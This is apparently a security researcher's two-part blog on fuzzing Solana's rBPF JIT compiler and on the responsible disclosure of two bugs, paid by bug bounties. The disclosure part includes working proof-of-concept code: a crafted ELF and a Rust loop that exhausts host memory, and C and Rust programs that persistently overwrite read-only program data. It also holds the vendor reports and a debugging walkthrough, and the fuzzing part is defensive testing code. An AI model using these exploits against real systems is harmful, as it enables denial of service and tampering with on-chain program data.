    • this, in tandem with the first step, will cause the loop to execute 32767 times (a total of 65534 instructions)
    • our meter updates here
  3. set r9 to r3 * 2^3, which is going to be zero because r3 starts at zero
  4. calls a nonexistent function
    • the nonexistent function should trigger an unknown symbol error, but that doesn’t happen because our meter updates here and emits a max instructions exceeded error

However, based on the original order of the instructions, what happens in the call is the following:

  1. invoke the call, which fails because the symbol is unresolved
  2. to report the unresolved symbol, we invoke that report_unresolved_symbol function, which returns the name of the symbol invoked (or “Unknown”) in a heap-allocated string
  3. the pc is updated
  4. the instruction count is validated, which overwrites the unresolved symbol error and terminates execution

Because the unresolved symbol error is merely overwritten, the value is never passed to the Rust code which invoked the JIT program. As a result, the reference to the heap-allocated String is lost and never dropped. Thus: any pointer to that heap allocation is lost and will never be freed, leading to the leak.

That being said, the leak is only seven bytes per execution of the program. Without causing a larger leak, this isn’t particularly exploitable.


Let’s take a closer look at report_unresolved_symbol.

report_unresolved_symbol source
pub fn report_unresolved_symbol(&self, insn_offset: usize) -> Result<u64, EbpfError<E>> {
    let file_offset = insn_offset
        .saturating_add(self.text_section_info.offset_range.start as usize);

    let mut name = "Unknown";
    if let Ok(elf) = Elf::parse(self.elf_bytes.as_slice()) {
        for relocation in &elf.dynrels {
            match BpfRelocationType::from_x86_relocation_type(relocation.r_type) {
                Some(BpfRelocationType::R_Bpf_64_32) | Some(BpfRelocationType::R_Bpf_64_64) => {
                    if relocation.r_offset as usize == file_offset {
                        let sym = elf
                        name = elf
                _ => (),
            .and_then(|offset| offset.checked_add(ebpf::ELF_INSN_DUMP_OFFSET))

Note how the name is the string which becomes heap allocated. The value of the name is determined by a relocation lookup in the ELF, which we can actually control if we compile our own malicious ELF. Even though the fuzzer only tests the JIT operations, one of the intended ways to load a BPF program is as an ELF, so it seems like something that would certainly be in scope.

Crafting the malicious ELF

To create an unresolved relocation in BPF, it’s actually quite simple. We just need to create a function with a very, very long name that isn’t actually defined, only declared. To do so, I created two files to craft the malicious ELF:


evil.h is far too large to post here, as it has a function name that is approximately a mebibyte long. Instead, it was generated with the following bash command.

$ echo "#define EVIL do_evil_$(printf 'a%.0s' {1..1048576})

void EVIL();
" > evil.h
#include "evil.h"

void entrypoint() {
  asm("	goto +0\n"
      "	r0 = 0\n");

Note that goto +0 is used here because we’ll use a specialised instruction meter that only can do two instructions.

Finally, we’ll also make a Rust program to load and execute this ELF just to make sure the maintainers are able to replicate the issue.

You won’t be able to use this particular example anymore as rBPF has changed a lot of its API since the time this was created. However, you can check out version v0.22.21, which this exploit was crafted for.

Note in particular the use of an instruction meter with two remaining.

use std::collections::BTreeMap;
use std::fs::File;
use std::io::Read;

use solana_rbpf::{elf::{Executable, register_bpf_function}, insn_builder::IntoBytes, vm::{Config, EbpfVm, TestInstructionMeter, SyscallRegistry}, user_error::UserError};
use solana_rbpf::insn_builder::{Arch, BpfCode, Cond, Instruction, MemSize, Source};

use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::verifier::check;

fn main() {
    let mut file = File::open("tests/elfs/").unwrap();
    let mut elf = Vec::new();
    file.read_to_end(&mut elf).unwrap();
    let config = Config {
        enable_instruction_tracing: true,
    let mut syscall_registry = SyscallRegistry::default();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_elf(&elf, Some(check), config, syscall_registry).unwrap();
    if Executable::jit_compile(&mut executable).is_ok() {
        for _ in 0.. {
            let mut jit_mem = [0; 65536];
            let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
            let mut jit_meter = TestInstructionMeter { remaining: 2 };
            jit_vm.execute_program_jit(&mut jit_meter).ok();

With our malicious ELF that has a function name that’s a mebibyte long, the report_unresolved_symbol will set that name variable to the long function name. As a result, the allocated string will leak a whole mebibyte of memory per execution rather than the measly seven bytes. When performed in this loop, the entire system’s memory will be exhausted in mere moments.


Okay, so now that we’ve crafted the exploit, we should probably report it to the vendor.

A quick Google later and we find the Solana security policy. Scrolling through, it says:

DO NOT CREATE AN ISSUE to report a security problem. Instead, please send an email to [email protected] and provide your github username so we can add you to a new draft security advisory for further discussion.

Okay, reasonable enough. Looks like they have bug bounties too!

DoS Attacks: $100,000 USD in locked SOL tokens (locked for 12 months)

Woah. I was working on rBPF out of curiosity, but it seems that there’s quite a bounty made available here.

I sent in my bug report via email on January 31st, and, within just three hours, Solana acknowledged the bug. Below is the report as submitted to Solana:

Report for bug 1 as submitted to Solana

There is a resource exhaustion vulnerability in solana_rbpf (specifically in src/ which affects JIT-compiled eBPF programs (both ELF and insn_builder programs). An adversary with the ability to load and execute eBPF programs may be able to exhaust memory resources for the program executing solana_rbpf JIT-compiled programs.

The vulnerability is introduced by the JIT compiler’s emission of an unresolved symbol error when attempting to call an unknown hash after exceeding the instruction meter limit. The rust call emitted to Executable::report_unresolved_symbol allocates a string (“Unknown”, or the relocation symbol associated with the call) using .to_string(), which performs a heap allocation. However, because the rust call completes with an instruction meter subtraction and check, the check causes the early termination of the program with Err(ExceededMaxInstructions(_, _)). As a result, the reference to the error which contains the string is lost and thus the string is never dropped, leading to a heap memory leak.

The following eBPF program demonstrates the vulnerability:

    goto +0
    r0 = 0
    call -1

where the tail call’s immediate argument represents an unknown hash (this can be compiled directly, but not disassembled) and with a instruction meter set to 2 instructions remaining.

The optimisation used in to only update the instruction meter is triggered after the ja instruction, and subsequently the mov64 instruction does not update the instruction meter despite the fact that it should prevent further execution here. The call instruction then performs a lookup for the non-existent symbol, leading to the execution of Executable::report_unresolved_symbol which performs the allocation. The call completes and updates the instruction meter again, now emitting the ExceededMaxInstructions error instead and losing the reference to the heap-allocated string.

While the leak in this example is only 7 bytes per error emitted (as the symbol string loaded is “Unknown”), one could craft an ELF with an arbitrarily sized relocation entry pointing to the call’s offset, causing a much faster exhaustion of memory resources. Such an example is attached with source code. I was able to exhaust all memory on my machine within a few seconds by simply repeatedly jit-executing this binary. A larger relocation entry could be crafted, but I think the example provided makes the vulnerability quite clear.

Attached is a Rust file ( which may be placed within the examples/ directory of solana_rbpf in order to test the evil.{c,h,so} provided. It is highly recommend to run this for a short period of time and cancelling it quickly, as it quickly exhausts memory resources for the operating system.

Additionally, one could theoretically trigger this behaviour in programs not loaded by the attacker by sending crafted payloads which cause this meter misbehaviour. However, this is unlikely because one would also need to submit such a payload to a target which has an unresolved symbol.

For these reasons, I propose that this bug be classified under DoS Attacks (Non-RPC).

Solana classified this bug as a Denial-of-Service (Non-RPC) and awarded $100k.

Bug 2: Persistent .rodata corruption

The second bug I reported was easy to find, but difficult to diagnose. While the bug occurred with high frequency, it was unclear as to what exactly what caused the bug. Past that, was it even exploitable or useful?

Initial Investigation

The input that triggered the crash disassembles to the following assembly:

    or32 r9, -1
    mov32 r1, -1
    stxh [r9+0x1], r0

The crash type triggered was a difference in JIT vs interpreter exit state; JIT terminated with Ok(0), whereas interpreter terminated with:

Err(AccessViolation(31, Store, 4294967296, 2, "program"))

Spicy stuff. Looks like our JIT implementation has some form of out-of-bounds write. Let’s investigate a bit further.

The first thing of note is the access violation’s address: 4294967296. In other words, 0x100000000. Looking at the Solana documentation, we see that this address corresponds to program code. Are we writing to JIT’d code??

The answer, dear reader, is unfortunately no. As exciting as the prospect of arbitrary code execution might be, this actually refers to the BPF program code – more specifically, it refers to the read-only data present in the ELF provided. Regardless, it is writing to a immutable reference to a Vec somewhere that represents the program code, which is supposed to be read-only.

So why isn’t it?

The curse of x86

Let’s make our payload more clear and execute directly, then pop it into gdb to see exactly what code the JIT compiler is generating. I used the following program to test for OOB write:

This code likely no longer works due to changes in the API of rBPF changing in recent releases. Try it in examples/ in v0.2.22, where the vulnerability is still present.

use std::collections::BTreeMap;
use solana_rbpf::{
    vm::{Config, EbpfVm, SyscallRegistry, TestInstructionMeter},
use solana_rbpf::elf::register_bpf_function;
use solana_rbpf::error::UserDefinedError;
use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::vm::InstructionMeter;

fn dump_insns<E: UserDefinedError, I: InstructionMeter>(executable: &Executable<E, I>) {
    let analysis = Analysis::from_executable(executable);
    // eprint!("Using the following disassembly");
    analysis.disassemble(&mut std::io::stdout()).unwrap();

fn main() {
    let config = Config::default();
    let mut code = BpfCode::default();
    let mut jit_mem = Vec::new();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&mut bpf_functions, 0, "entrypoint", false).unwrap();
    let mut prog = code.into_bytes();
    assert!(check(prog, &config).is_ok());
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(prog, None, config, SyscallRegistry::default(), bpf_functions).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
    let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };
    let jit_res = jit_vm.execute_program_jit(&mut jit_meter);
    if let Ok(_) = jit_res {
        eprintln!("{} => {:?} ({:?})", 0, jit_res, &jit_mem);

This just sets up and executes the following BPF assembly:

    lddw r9, 0x100000000
    stxh [r9+0x0], r0

This assembly simply writes a 0 to 0x100000000.

For the next part: please, for the love of god, use GEF.

$ cargo +stable build --example oob-write
$ gdb ./target/debug/examples/oob-write
gef➤  break src/ # after the JIT'd code is prepared
gef➤  run
gef➤  print self.executable.ro_section.buf.ptr.pointer 
gef➤  awatch *$1 # break if we modify the readonly section
gef➤  record full # set up for reverse execution
gef➤  continue

After that last continue, we effectively execute until we hit the write access to our read-only section. Additionally, we can step backwards in the program until we find our faulty behaviour.

The watched memory is written to as a result of this X86 store instruction (as a reminder, we this is the branch for stxh). Seeing this emit_address_translation call above it, we can determine that that function likely handles the address translation and readonly checks.

Further inspection shows that emit_address_translation actually emits a call to… something:

emit_call(jit, TARGET_PC_TRANSLATE_MEMORY_ADDRESS + len.trailing_zeros() as usize + 4 * (access_type as usize))?;

Okay, so this is some kind of global offset for this JIT program to translate the memory address. By searching for TARGET_PC_TRANSLATE_MEMORY_ADDRESS elsewhere in the program, we find a loop which initialises different kinds of memory translations.

Scrolling through this, we find our access check:

X86Instruction::cmp_immediate(OperandSize::S8, RAX, 0, Some(X86IndirectAccess::Offset(25))).emit(self)?; // region.is_writable == 0

Okay – so the x86 cmp instruction to find is one that uses a destination of [rax+0x19]. A couple rsi later to find such an instruction and we find:

cmp    DWORD PTR [rax+0x19], 0x0

Which is, notably, not using an 8-bit operand as the cmp_immediate call suggests. So what’s going on here?

x86 cmp operand size woes

Here is the definition of X86Instruction::cmp_immediate:

pub fn cmp_immediate(
    size: OperandSize,
    destination: u8,
    immediate: i64,
    indirect: Option<X86IndirectAccess>,
) -> Self {
    Self {
        opcode: 0x81,
        first_operand: RDI,
        second_operand: destination,
        immediate_size: OperandSize::S32,

This creates an x86 instruction with the opcode 0x81. Inspecting closer and cross-referencing with an x86-64 opcode reference, you can find that opcode 0x81 is only defined for 16-, 32-, and 64-bit register operands. If you want to use an 8-bit register operand, you’ll need to use the 0x80 opcode variant.

This is precisely the patch applied.

A quick side note about testing code with different compilers

This bug actually was a bit weirder than it seems at first. Due to differences in Rust struct padding between versions, at the time that I reported the bug, the difference was spurious in stable release. As a result, it’s quite likely that no one would have noticed the bug until the next Rust release version.

From my report:

It is likely that this bug was not discovered earlier due to inconsistent behaviour between various versions of Rust. During testing, it was found that stable release did not consistently have non-zero field padding where stable debug, nightly debug, and nightly release did.

Proof of concept

Alright, now to create a PoC so that the people inspecting the bug can validate it. Like last time, we’ll create an ELF, along with a few different demonstrations of the effects of the bug. Specifically, we want to demonstrate that read-only values in the BPF target can be modified persistently, as our writes affect the executable and thus all future executions of the JIT program.


This program should fail, as the data to be overwritten should be read-only. It will be executed by

typedef unsigned char uint8_t;
typedef unsigned long int uint64_t;

extern void log(const char*, uint64_t);

static const char data[] = "howdy";

extern uint64_t entrypoint(const uint8_t *input) {
  log(data, 5);
  char *overwritten = (char *)data;
  overwritten[0] = 'e';
  overwritten[1] = 'v';
  overwritten[2] = 'i';
  overwritten[3] = 'l';
  overwritten[4] = '!';
  log(data, 5);

  return 0;

This program loads the compiled version of value_in_ro.c and attaches a log syscall so that we can see the behaviour internally. I confirmed that this syscall did not affect the runtime behaviour.

use std::collections::BTreeMap;
use std::fs::File;
use std::io::Read;
use solana_rbpf::{
    vm::{Config, EbpfVm, SyscallRegistry, TestInstructionMeter},
use solana_rbpf::elf::register_bpf_function;
use solana_rbpf::error::UserDefinedError;
use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::vm::{InstructionMeter, SyscallObject};

fn main() {
    let config = Config {
        enable_instruction_tracing: true,
    let mut jit_mem = vec![0; 32];
    let mut elf = Vec::new();
    File::open("tests/elfs/").unwrap().read_to_end(&mut elf);
    let mut syscalls = SyscallRegistry::default();
    syscalls.register_syscall_by_name(b"log", solana_rbpf::syscalls::BpfSyscallString::call);
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_elf(&elf, Some(check), config, syscalls).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    for _ in 0..4 {
        let jit_res = {
            let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
            let mut jit_meter = TestInstructionMeter { remaining: 1 << 18 };
            let res = jit_vm.execute_program_jit(&mut jit_meter);
        eprintln!("{} => {:?}", 1, jit_res);

This program, when executed, has the following output:


These first two files demonstrate the ability to overwrite the readonly data present in binaries persistently. Notice that we actually execute the JIT’d code multiple times, yet our changes to the value in data are persistent.


Suppose that there was a faulty offset or a user-controlled offset present in a BPF-based on-chain program. A malicious user could modify the readonly data of the program to replace certain contexts. In the best case scenario, this might lead to DoS of the program. In the worst case, this could lead to the replacement of fund amounts, of wallet addresses, etc.


Having assembled my proof-of-concepts, my implications, and so on, I sent in the following report to Solana on February 4th:

Report for bug 2 as submitted to Solana

An incorrectly sized memory operand emitted by src/ may lead to .rodata section corruption due to an incorrect is_writable check. The cmp emitted is cmp DWORD PTR [rax+0x19], 0x0. As a result, when the uninitialised data present in the field padding of MemoryRegion is non-zero, the comparison will fail and assume that the section is writable. The data which is overwritten is persistent during the lifetime of the Executable instance as the data overwritten is in Executable.ro_section and thus affects future executions of the program without recompilation.

It is likely that this bug was not discovered earlier due to inconsistent behaviour between various versions of Rust. During testing, it was found that stable release did not consistently have non-zero field padding where stable debug, nightly debug, and nightly release did.

The first attack scenario where this vulnerability may be leveraged is in corruption of believed read-only data; see value_in_ro.{c,so} (intended to be placed within tests/elfs/) as an example of this behaviour. The example provided is contrived, but in scenarios where BPF programs do not correctly sanitise offsets in input, it may be possible for remote attackers to craft payloads which corrupt data within the .rodata section and thus replace secrets, operational data, etc. In the worst case, this may include replacement of critical data such as fixed wallet addresses for the lifetime of the Executable instance, which may be many executions. To test this behaviour, refer to (intended to be placed within examples/). If you find that corruption behaviour does not appear, try using a different optimisation level or compiler.

The second attack scenario is in corruption of BPF source code, which poisons future analysis and compilation. In the worst case (which is probably not a valid scenario), if the Executable is erroneously JIT compiled a second time after being executed in JIT once, the JIT compilation may emit unchecked BPF instructions as the verifier used in from_elf/from_text_bytes is not used per-compilation. Analysis and tracing is similarly corrupted, which may be leveraged to obscure or misrepresent the instructions which were previously executed. An example of the latter is provided in (intended to be placed within examples/). If you find that corruption behaviour does not appear, try using a different optimisation level or compiler.

While this vulnerability is largely uncategorised by the security policy provided, due to the possibility of the corruption of believed read-only data, I propose that this vulnerability be categorised under Other Attacks or Safety Violations.

value_in_ro.c (.so available upon request)
typedef unsigned char uint8_t;
typedef unsigned long int uint64_t;

extern void log(const char*, uint64_t);

static const char data[] = "howdy";

extern uint64_t entrypoint(const uint8_t *input) {
  log(data, 5);
  char *overwritten = (char *)data;
  overwritten[0] = 'e';
  overwritten[1] = 'v';
  overwritten[2] = 'i';
  overwritten[3] = 'l';
  overwritten[4] = '!';
  log(data, 5);

  return 0;
use std::collections::BTreeMap;

use solana_rbpf::elf::Executable;
use solana_rbpf::elf::register_bpf_function;
use solana_rbpf::insn_builder::BpfCode;
use solana_rbpf::insn_builder::Instruction;
use solana_rbpf::insn_builder::IntoBytes;
use solana_rbpf::insn_builder::MemSize;
use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::user_error::UserError;
use solana_rbpf::verifier::check;
use solana_rbpf::vm::Config;
use solana_rbpf::vm::EbpfVm;
use solana_rbpf::vm::SyscallRegistry;
use solana_rbpf::vm::TestInstructionMeter;

fn main() {
    let config = Config {
        enable_instruction_tracing: true,
    let mut jit_mem = vec![0; 32];
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&mut bpf_functions, 0, "entrypoint", true).unwrap();
    let mut code = BpfCode::default();
    let prog = code.into_bytes();
    assert!(check(prog, &config).is_ok());
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(prog, None, config, SyscallRegistry::default(), bpf_functions).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    let jit_res = {
        let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
        let mut jit_meter = TestInstructionMeter { remaining: 1 << 18 };
        let res = jit_vm.execute_program_jit(&mut jit_meter);
        let jit_tracer = jit_vm.get_tracer();
        let analysis = Analysis::from_executable(&executable);
        let stderr = std::io::stderr();
        jit_tracer.write(&mut stderr.lock(), &analysis).unwrap();
    eprintln!("{} => {:?}", 1, jit_res);
use std::fs::File;
use std::io::Read;

use solana_rbpf::elf::Executable;
use solana_rbpf::user_error::UserError;
use solana_rbpf::verifier::check;
use solana_rbpf::vm::Config;
use solana_rbpf::vm::EbpfVm;
use solana_rbpf::vm::SyscallObject;
use solana_rbpf::vm::SyscallRegistry;
use solana_rbpf::vm::TestInstructionMeter;

fn main() {
    let config = Config {
        enable_instruction_tracing: true,
    let mut jit_mem = vec![0; 32];
    let mut elf = Vec::new();
    File::open("tests/elfs/").unwrap().read_to_end(&mut elf).unwrap();
    let mut syscalls = SyscallRegistry::default();
    syscalls.register_syscall_by_name(b"log", solana_rbpf::syscalls::BpfSyscallString::call).unwrap();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_elf(&elf, Some(check), config, syscalls).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    for _ in 0..4 {
        let jit_res = {
            let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
            let mut jit_meter = TestInstructionMeter { remaining: 1 << 18 };
            let res = jit_vm.execute_program_jit(&mut jit_meter);
        eprintln!("{} => {:?}", 1, jit_res);

The bug was patched in a mere 4 hours.

Solana classified this bug as a Denial-of-Service (Non-RPC) and awarded $100k. I disagreed strongly with this classification, but Solana said that due to the low likelihood of the exploitation of this bug (requiring a vulnerability in the on-chain program) they would offer $100k instead of the originally suggested $1m or $400k. They would not move on this point.

However, I would offer that (was that the actually basis for bug classification) that they should update their Security Policy to reflect that meaning. It was obviously very disappointing to hear that they would not be offering the bounty I expected given the classification categories provided.

Okay, so what’d you do with the money??

It would be bad form of me to not explain the incredible flexibility shown by Solana in terms of how they handled my payout. I intended to donate the funds to the Texas A&M Cybersecurity Club, at which I gained a lot of the skills necessary to perform this research and these exploits, and Solana was very willing to sidestep their listed policy and donate the funds directly in USD rather than making me handle the tokens on my own, which would have dramatically affected how much I could have donated due to tax. So, despite my concerns regarding their policy, I was very pleased with their willingness to accommodate my wishes with the bounty payout.

Earn $200K by fuzzing for a weekend: Part 1

By: addison
11 May 2022 at 07:00

By applying well-known fuzzing techniques to a popular target, I found several bugs that in total yielded over $200K in bounties. In this article I will demonstrate how powerful fuzzing can be when applied to software which has not yet faced sufficient testing.

If you’re here just for the bug disclosures, see Part 2, though I encourage you all, even those who have not yet tried their hand at fuzzing, to read through this.


A few friends and I ran a little Discord server (now a Matrix space) which in which we discussed security and vulnerability research techniques. One of the things we have running in the server is a bot which posts every single CVE as they come out. And, yeah, I read a lot of them.

One day, the bot posted something that caught my eye:

This marks the beginning of our timeline: January 28th. I had noticed this CVE in particular for two reasons:

  • it was BPF, which I find to be an absurdly cool concept as it’s used in the Linux kernel (a JIT compiler in the kernel!!! what!!!)
  • it was a JIT compiler written in Rust

This CVE showed up almost immediately after I had developed some relatively intensive fuzzing for some of my own Rust software (specifically, a crate for verifying sokoban solutions where I had observed similar issues and thought “that looks familiar”).

Knowing what I had learned from my experience fuzzing my own software and that bugs in Rust programs could be quite easily found with the combo of cargo fuzz and arbitrary, I thought: “hey, why not?”.

The Target, and figuring out how to test it

Solana, as several of you likely know, “is a decentralized blockchain built to enable scalable, user-friendly apps for the world”. They primarily are known for their cryptocurrency, SOL, but also are a blockchain which operates really any form of smart contract.

rBPF in particular is a self-described “Rust virtual machine and JIT compiler for eBPF programs”. Notably, it implements both an interpreter and a JIT compiler for BPF programs. In other words: two different implementations of the same program, which theoretically exhibited the same behaviour when executed.

I was lucky enough to both take a software testing course in university and to have been part of a research group doing fuzzing (admittedly, we were fuzzing hardware, not software, but the concepts translate). A concept that I had hung onto in particular is the idea of test oracles – a way to distinguish what is “correct” behaviour and what is not in a design under test.

In particular, something that stood out to me about the presence of both an interpreter and a JIT compiler in rBPF is that we, in effect, had a perfect pseudo-oracle; as Wikipedia puts it:

a separately written program which can take the same input as the program or system under test so that their outputs may be compared to understand if there might be a problem to investigate.

Those of you who have more experience in fuzzing will recognise this concept as differential fuzzing, but I think we can often overlook that differential fuzzing is just another face of a pseudo-oracle.

In this particular case, we can execute the interpreter, one implementation of rBPF, and then execute the JIT compiled version, another implementation, with the same inputs (i.e., memory state, entrypoint, code, etc.) and see if their outputs are different. If they are, one of them must necessarily be incorrect per the description of the rBPF crate: two implementations of exactly the same behaviour.

Writing a fuzzer

To start off, let’s try to throw a bunch of inputs at it without really tuning to anything in particular. This allows us to sanity check that our basic fuzzing implementation actually works as we expect.

The dumb fuzzer

First, we need to figure out how to execute the interpreter. Thankfully, there are several examples of this readily available in a variety of tests. I referenced the test_interpreter_and_jit macro present in as the basis for how my so-called “dumb” fuzzer executes.

I’ve provided a sequence of components you can look at one chunk at a time before moving onto the whole fuzzer. Just click on the dropdowns to view the code relevant to that step. You don’t necessarily need to to understand the point of this post.

Step 1: Defining our inputs

We must define our inputs such that it’s actually useful for our fuzzer. Thankfully, arbitrary makes it near trivial to derive an input from raw bytes.

#[derive(arbitrary::Arbitrary, Debug)]
struct DumbFuzzData {
    template: ConfigTemplate,
    prog: Vec<u8>,
    mem: Vec<u8>,

If you want to see the definition of ConfigTemplate, you can check it out in, but all you need to know is that its purpose is to test the interpreter under a variety of different execution configurations. It’s not particularly important to understand the fundamental bits of the fuzzer.

Step 2: Setting up the VM

Setting up the fuzz target and the VM comes next. This will allow us to not only execute our test, but later to actually check if the behaviour is correct.

fuzz_target!(|data: DumbFuzzData| {
    let prog = data.prog;
    let config = data.template.into();
    if check(&prog, &config).is_err() {
        // verify please
    let mut mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
    let mem_region = MemoryRegion::new_writable(&mut mem, ebpf::MM_INPUT_START);
    let mut vm =
        EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![mem_region]).unwrap();

    // TODO in step 3

You can find the details for how fuzz_target works from the Rust Fuzz Book which goes over how it works in higher detail than would be appropriate here.

Step 3: Executing our input and comparing output

In this step, we just execute the VM with our provided input. In future iterations, we’ll compare the output of interpreter vs JIT, but in this version, we’re just executing the interpreter to see if we can induce crashes.

fuzz_target!(|data: DumbFuzzData| {
    // see step 2 for this bit

        &mut TestInstructionMeter { remaining: 1024 },

I use black_box here but I’m not entirely convinced that it’s necessary. I added it to ensure that the result of the interpreted program’s execution isn’t simply discarded and thus the execution marked unnecessary, but I’m fairly certain it wouldn’t be regardless.

Note that we are not checking for if the execution failed here. If the BPF program fails: we don’t care! We only care if the VM crashes for any reason.

Step 4: Put it together

Below is the final code for the fuzzer, including all of the bits I didn’t show above for concision.


use std::collections::BTreeMap;
use std::hint::black_box;

use libfuzzer_sys::fuzz_target;

use solana_rbpf::{
    elf::{register_bpf_function, Executable},
    vm::{EbpfVm, SyscallRegistry, TestInstructionMeter},

use crate::common::ConfigTemplate;

mod common;

#[derive(arbitrary::Arbitrary, Debug)]
struct DumbFuzzData {
    template: ConfigTemplate,
    prog: Vec<u8>,
    mem: Vec<u8>,

fuzz_target!(|data: DumbFuzzData| {
    let prog = data.prog;
    let config = data.template.into();
    if check(&prog, &config).is_err() {
        // verify please
    let mut mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
    let mem_region = MemoryRegion::new_writable(&mut mem, ebpf::MM_INPUT_START);
    let mut vm =
        EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![mem_region]).unwrap();

        &mut TestInstructionMeter { remaining: 1024 },

Theoretically, an up-to-date version is available in the rBPF repo.


$ cargo +nightly fuzz run dumb -- -max_total_time=300
... snip ...
#2902510	REDUCE cov: 1092 ft: 2147 corp: 724/58Kb lim: 4096 exec/s: 9675 rss: 355Mb L: 134/3126 MS: 3 ChangeBit-InsertByte-PersAutoDict- DE: "\x07\xff\xff3"-
#2902537	REDUCE cov: 1092 ft: 2147 corp: 724/58Kb lim: 4096 exec/s: 9675 rss: 355Mb L: 60/3126 MS: 2 ChangeBinInt-EraseBytes-
#2905608	REDUCE cov: 1092 ft: 2147 corp: 724/58Kb lim: 4096 exec/s: 9685 rss: 355Mb L: 101/3126 MS: 1 EraseBytes-
#2905770	NEW    cov: 1092 ft: 2155 corp: 725/58Kb lim: 4096 exec/s: 9685 rss: 355Mb L: 61/3126 MS: 2 ShuffleBytes-CrossOver-
#2906805	DONE   cov: 1092 ft: 2155 corp: 725/58Kb lim: 4096 exec/s: 9657 rss: 355Mb
Done 2906805 runs in 301 second(s)

After executing the fuzzer, we can evaluate its effectiveness at finding interesting inputs by checking its coverage after executing for a given time (note the use of the -max_total_time flag). In this case, I want to determine just how well it covers the function which handles interpreter execution. To do so, I issue the following commands:

$ cargo +nightly fuzz coverage dumb
$ rust-cov show -Xdemangler=rustfilt fuzz/target/x86_64-unknown-linux-gnu/release/dumb -instr-profile=fuzz/coverage/dumb/coverage.profdata -show-line-counts-or-regions -name=execute_program_interpreted_inner
Command output of rust-cov

If you’re not familiar with llvm coverage output, the first column is the line number, the second column is the number of times that that particular line was hit, and the third column is the code itself.

<solana_rbpf::vm::EbpfVm<solana_rbpf::user_error::UserError, solana_rbpf::vm::TestInstructionMeter>>::execute_program_interpreted_inner:
  709|    763|    fn execute_program_interpreted_inner(
  710|    763|        &mut self,
  711|    763|        instruction_meter: &mut I,
  712|    763|        initial_insn_count: u64,
  713|    763|        last_insn_count: &mut u64,
  714|    763|    ) -> ProgramResult<E> {
  715|    763|        // R1 points to beginning of input memory, R10 to the stack of the first frame
  716|    763|        let mut reg: [u64; 11] = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, self.stack.get_frame_ptr()];
  717|    763|        reg[1] = ebpf::MM_INPUT_START;
  718|    763|
  719|    763|        // Loop on instructions
  720|    763|        let config = self.executable.get_config();
  721|    763|        let mut next_pc: usize = self.executable.get_entrypoint_instruction_offset()?;
  722|    763|        let mut remaining_insn_count = initial_insn_count;
  723|   136k|        while (next_pc + 1) * ebpf::INSN_SIZE <= self.program.len() {
  724|   135k|            *last_insn_count += 1;
  725|   135k|            let pc = next_pc;
  726|   135k|            next_pc += 1;
  727|   135k|            let mut instruction_width = 1;
  728|   135k|            let mut insn = ebpf::get_insn_unchecked(self.program, pc);
  729|   135k|            let dst = insn.dst as usize;
  730|   135k|            let src = insn.src as usize;
  731|   135k|
  732|   135k|            if config.enable_instruction_tracing {
  733|      0|                let mut state = [0u64; 12];
  734|      0|                state[0..11].copy_from_slice(&reg);
  735|      0|                state[11] = pc as u64;
  736|      0|                self.tracer.trace(state);
  737|   135k|            }
  738|       |
  739|   135k|            match insn.opc {
  740|   135k|                _ if dst == STACK_PTR_REG && config.dynamic_stack_frames => {
  741|    361|                    match insn.opc {
  742|     16|                        ebpf::SUB64_IMM => self.stack.resize_stack(-insn.imm),
  743|    345|                        ebpf::ADD64_IMM => self.stack.resize_stack(insn.imm),
  744|       |                        _ => {
  745|       |                            #[cfg(debug_assertions)]
  746|      0|                            unreachable!("unexpected insn on r11")
  747|       |                        }
  748|       |                    }
  749|       |                }
  750|       |
  751|       |                // BPF_LD class
  752|       |                // Since this pointer is constant, and since we already know it (ebpf::MM_INPUT_START), do not
  753|       |                // bother re-fetching it, just use ebpf::MM_INPUT_START already.
  754|       |                ebpf::LD_ABS_B   => {
  755|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  756|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
  757|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  758|       |                },
  759|       |                ebpf::LD_ABS_H   =>  {
  760|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  761|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
  762|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  763|       |                },
  764|       |                ebpf::LD_ABS_W   => {
  765|      2|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  766|      2|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
